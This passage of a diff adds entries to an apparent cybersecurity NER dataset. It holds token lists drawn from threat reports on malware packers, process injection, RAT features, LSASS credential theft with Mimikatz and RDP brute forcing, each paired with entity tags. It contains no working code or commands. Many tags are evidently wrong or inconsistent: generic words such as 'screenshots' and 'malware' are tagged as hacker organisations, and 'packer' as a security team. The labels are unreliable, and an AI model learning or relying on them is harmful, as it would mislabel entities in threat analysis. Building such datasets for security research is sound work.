"section,", + "write", + "it", + "to", + "disk", + "and", + "execute", + "it" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "variety", + "of", + "packers", + "used", + "for", + "these", + "executables" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "different", + "variants", + "of", + "a", + "packer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "packed", + "with", + "CyaX" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "is", + "gzip-decompressed", + "and", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + ".NET", + "packer", + "known", + "as", + "CyaX" + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "used", + "an", + "AutoIt", + "packer", + "that", + "comes", + "heavily", + "obfuscated." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "used", + "various", + "layers", + "of", + "packers", + "for", + "obfuscating", + "their", + "droppers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decrypt" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decrypts", + "it" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "another", + "executable" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "string", + "that", + "will", + "be", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "array", + "by", + "doing", + "a", + "single-byte", + "XOR", + "operation,", + "cycling", + "through", + "the", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decryption", + "of", + "the", + "payload", + "is", + "based", + "on", + "XOR", + "operations" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "single-byte", + "XOR", + "algorithm." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "used", + "various", + "encryption", + "algorithms", + "in", + "their", + "droppers", + "to", + "hide", + "strings", + "and", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injecting", + "it", + "into", + "legitimate", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "be", + "injected", + "into", + "a", + "new", + "process", + "or", + "loaded", + "in", + "the", + "same", + "process", + "space" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injected", + "into", + "a", + "different", + "process," + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injection", + "of", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "performs", + "the", + "injection", + "and", + "execution", + "of", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "inject", + "it", + "into", + "some", + "process" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shellcode", + "with", + "RunPE", + "code", + "is", + "used", + "to", + "perform", + "the", + "injection" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RAR", + "archive", + "is", + "downloaded" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "compressed", + "archives" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "layers", + "of", + "encryption,", + "obfuscation", + "or", + "anti-analysis" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "was", + "hiding", + "in", + "non-malicious", + "code," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "resource", + "and", + "XORed", + "with", + "a", + "hardcoded", + "password" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "with", + "this", + "same", + "XOR-based", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "is", + "run", + "with", + "rundll32" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "steganography" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "reads", + "pixels", + "from", + "an", + "image", + "contained", + "in", + "the", + "first", + "binary" + ], + "ner_tags": [ + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stores", + "every", + "pixel", + "as", + "three", + "numbers", + "according", + "to", + "its", + "red,", + "green", + "and", + "blue", + "components" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "used", + "packers", + "that", + "read", + "pixel", + "data", + "from", + "images", + "contained", + "in", + "PE", + "files’", + "resource", + "sections", + "and", + "build", + "the", + "next", + "layer", + "of", + "execution", + "from", + "the", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "that", + "will", + "be", + "loaded", + "and", + "called", + "in", + "the", + "same", + "address", + "space" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "performs", + "the", + "injection", + "is", + "contained", + "in", + "an", + "array", + "and", + "is", + "dynamically", + "loaded." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "disabling", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "used", + "CyaX", + "packer,", + "which", + "can", + "disable", + "Windows", + "Defender." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "checking", + "for", + "security", + "products" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "droppers", + "that", + "check", + "for", + "security", + "software", + "present", + "in", + "a", + "victim’s", + "computer" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "loaded", + "with", + "VirtualAlloc", + "and", + "executed" + ], + "ner_tags": [ + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "API", + "calls", + "in", + "their", + "droppers,", + "such", + "as", + "CreateProcessA,", + "WriteProcessMemory", + "and", + "ResumeThread,", + "to", + "load", + "and", + "execute", + "shellcode", + "in", + "memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "created", + "in", + "the", + "Startup", + "folder", + "to", + "execute", + "the", + "script." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "RATs", + "that", + "persist", + "by", + "creating", + "a", + "Run", + "registry", + "key", + "or", + "by", + "creating", + "a", + "copy", + "of", + "the", + "malware", + "in", + "the", + "Startup", + "folder" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Delete", + "the", + "dropper", + "executable" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "have", + "used", + "malware", + "that", + "deletes", + "itself", + "from", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Download", + "and", + "execute", + "files" + ], + "ner_tags": [ + "B-Features", + "O", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "ability", + "to", + "download", + "and", + "execute", + "other", + "malware" + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "uploading", + "and", + "downloading", + "files" + ], + "ner_tags": [ + "B-Features", + "O", + "B-Features", + "I-Features" + ] + }, + { + "tokens": [ + "keylogging" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "keylogging" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "keylogging," + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "have", + "keylogging", + "capabilities" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "screen", + "capture" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "taking", + "screenshots" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "can", + "capture", + "screenshots", + "of", + "victim", + "machines" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltration", + "of", + "files" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "exfiltrate", + "data", + "over", + "the", + "same", + "channel", + "used", + "for", + "C&C" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "used", + "RATs", + "that", + "can", + "launch", + "a", + "command", + "shell", + "for", + "executing", + "commands." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "have", + "used", + "scheduled", + "tasks", + "in", + "their", + "droppers", + "and", + "payloads", + "to", + "achieve", + "persistence" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "RATs", + "that", + "implement", + "UAC", + "bypassing." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "have", + "used", + "RATs", + "that", + "allow", + "full", + "access", + "to", + "the", + "Registry," + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "have", + "used", + "droppers", + "that", + "inject", + "the", + "payload", + "into", + "legitimate", + "processes" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "can", + "browse", + "file", + "systems" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "with", + "modules", + "that", + "show", + "running", + "processes" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "can", + "read", + "the", + "Registry." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "gather", + "system", + "information", + "such", + "as", + "computer", + "name", + "and", + "operating", + "system", + "during", + "the", + "initial", + "infection" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "can", + "collect", + "the", + "IP", + "address", + "of", + "the", + "victim", + "machine" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "retrieve", + "the", + "current", + "username", + "during", + "initial", + "infection" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "can", + "perform", + "remote", + "desktop", + "access." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "can", + "access", + "the", + "local", + "file", + "system", + "and", + "upload,", + "download", + "or", + "delete", + "files" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "I-Features" + ] + }, + { + "tokens": [ + "used", + "Remcos", + "RAT,", + "which", + "uses", + "RC4", + "for", + "encrypting", + "C&C", + "communications" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "various", + "RATs", + "that", + "use", + "TCP", + "for", + "C&C", + "communications" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "data", + "exfiltration", + "of", + "sensitive", + "information" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "move", + "through", + "the", + "victim", + "environment", + "via", + "RDP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "mass", + "deletion", + "of", + "virtual", + "machines,", + "storage,", + "and", + "configurations" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "identify", + "any", + "credentials", + "which", + "may", + "be", + "stored", + "in", + "technical", + "documentation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "extraction", + "of", + "sensitive", + "API", + "Keys" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Access", + "to", + "local", + "password", + "managers", + "and", + "databases", + "to", + "obtain", + "further", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "compromised", + "credentials", + "to", + "access", + "corporate", + "VPNs." + ], + "ner_tags": [ + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "victim", + "controlled", + "hostnames", + "were", + "revealed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "runs", + "a", + "scheduled", + "task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decryption", + "of", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "using", + "DPAPI" + ], + "ner_tags": [ + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "These", + "credentials", + "are", + "generated", + "and", + "stored", + "in", + "the", + "memory", + "of", + "the", + "LSASS", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attackers", + "may", + "attempt", + "to", + "access", + "LSASS", + "process", + "memory", + "to", + "extract", + "credentials", + "as", + "it", + "stores", + "a", + "variety", + "of", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LSASS", + "process", + "memory", + "is", + "one", + "of", + "the", + "prime", + "targets", + "for", + "attackers,", + "as", + "well", + "as", + "malware", + "armed", + "with", + "lateral", + "movement", + "capabilities", + "since", + "it", + "caches", + "a", + "variety", + "of", + "credentials" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Credential", + "extraction", + "from", + "the", + "LSASS", + "process" + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "credential-based", + "deception", + "is", + "to", + "stage", + "the", + "deceptive", + "credentials", + "in", + "LSASS", + "process", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "credentials", + "are", + "extracted", + "with", + "Mimikatz." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "credential", + "extraction", + "tool", + "Mimikatz" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "uses", + "the", + "CreateProcessWithLogonW", + "Windows", + "API" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "calling", + "the", + "API" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "recon", + "for", + "interesting", + "hostnames" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "public", + "facing", + "systems", + "is", + "compromised" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "be", + "injected", + "with", + "deceptive", + "credentials", + "at", + "multiple", + "places", + "like", + "LSASS", + "process", + "memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Injecting", + "NETONLY", + "credentials", + "into", + "LSASS", + "process", + "memory" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Injecting", + "credentials", + "into", + "LSASS", + "memory" + ], + "ner_tags": [ + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "credentials", + "being", + "picked", + "up", + "and", + "used", + "to", + "pivot", + "to", + "decoy", + "systems", + "in", + "the", + "network" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keyloggers" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "flood", + "a", + "remote", + "DNS", + "server", + "with", + "false", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "send", + "traffic", + "simultaneously", + "to", + "one", + "server," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "the", + "default", + "factory", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrating", + "data", + "from", + "the", + "target", + "device" + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "covert", + "channel", + "that", + "can", + "be", + "used", + "to", + "exfiltrate", + "data", + "from", + "the", + "victim", + "device" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deliver", + "more", + "malware," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "extract", + "data", + "and", + "files", + "from", + "endpoint", + "devices." + ], + "ner_tags": [ + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "version", + "of", + "the", + "malware", + "that", + "was", + "injected", + "into", + "a", + "victim’s", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "usually", + "pretends", + "to", + "be", + "a", + "legitimate", + "file,", + "such", + "as", + "an", + "Adobe", + "PDF", + "or", + "Dropbox", + "file," + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SamFile", + "O", + "B-Way", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "phishing", + "email", + "with", + "the", + "malicious", + "attachment" + ], + "ner_tags": [ + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "file", + "is", + "a", + "Python", + "program", + "packaged", + "by", + "PyInstaller." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "an", + "obfuscating", + "tool", + "for", + "Python", + "script", + "that", + "makes", + "the", + "malware", + "harder", + "to", + "be", + "analyzed", + "and", + "detected." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "contains", + "Base64-encoded", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Python", + "programs", + "that", + "are", + "obfuscated", + "using", + "PyArmor" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "After", + "decrypting", + "the", + "pyc", + "file," + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "it", + "uses", + "the", + "following", + "command", + "to", + "delete", + "the", + "data", + "in", + "PSReadline" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "It", + "also", + "checks", + "the", + "victim’s", + "hostname" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collects", + "browser", + "history", + "and", + "passwords", + "from", + "the", + "following", + "browsers" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "also", + "uses", + "the", + "command", + "“CopyFromScreen”", + "to", + "capture", + "a", + "screenshot." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Downloading", + "files", + "and", + "getting", + "a", + "screenshot" + ], + "ner_tags": [ + "B-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Download", + "components", + "for", + "the", + "Keylogger" + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "It", + "is", + "a", + "key", + "logger", + "that", + "saves", + "data", + "in", + "the", + "“KeyLogs”", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "downloads", + "three", + "components", + "from" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "be", + "executed", + "via", + "scheduled", + "tasks." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "was", + "quite", + "common", + "to", + "see", + "scheduled", + "tasks", + "used", + "to", + "create", + "persistence", + "for", + "the", + "ransomware", + "executable," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "also", + "expressed", + "interest", + "in", + "other", + "access", + "methods", + "such", + "as", + "RDP" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Credentials", + "that", + "have", + "either", + "been", + "reused", + "across", + "multiple", + "platforms", + "or", + "have", + "previously", + "been", + "exposed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "this", + "includes", + "VPN", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Compromised", + "accounts", + "may", + "be", + "used", + "to", + "maintain", + "access", + "to", + "the", + "network." + ], + "ner_tags": [ + "B-SamFile", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "B-Purp" + ] + }, + { + "tokens": [ + "local", + "accounts." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "domain", + "and", + "local", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Affiliates", + "have", + "been", + "seen", + "brute", + "forcing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Affiliates", + "have", + "been", + "seen", + "brute", + "forcing", + "exposed", + "RDP", + "services", + "and", + "compromising", + "accounts", + "with", + "weak", + "passwords." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exploit", + "Public-Facing", + "Applications" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "typically", + "executed", + "via", + "command", + "line", + "arguments" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "some", + "defense", + "evasion", + "batch", + "scripts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "batch", + "script", + "or", + "a", + "specially", + "crafted", + "command", + "line", + "script." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "ProxyShell", + "elevation", + "of", + "privilege", + "on", + "the", + "Exchange", + "PowerShell", + "Backend", + "(CVE-2021-34523),", + "Windows", + "Background", + "Intelligent", + "Transfer", + "Service", + "(BITS)", + "improperly", + "handling", + "symbolic", + "links", + "(CVE-2020-0787),", + "and", + "abusing", + "the", + "CMSTPLUA", + "COM", + "interface", + "have", + "all", + "been", + "seen", + "as", + "methods", + "of", + "privilege", + "escalation." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "utilized", + "a", + "UAC", + "bypass", + "tool." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Indicators,", + 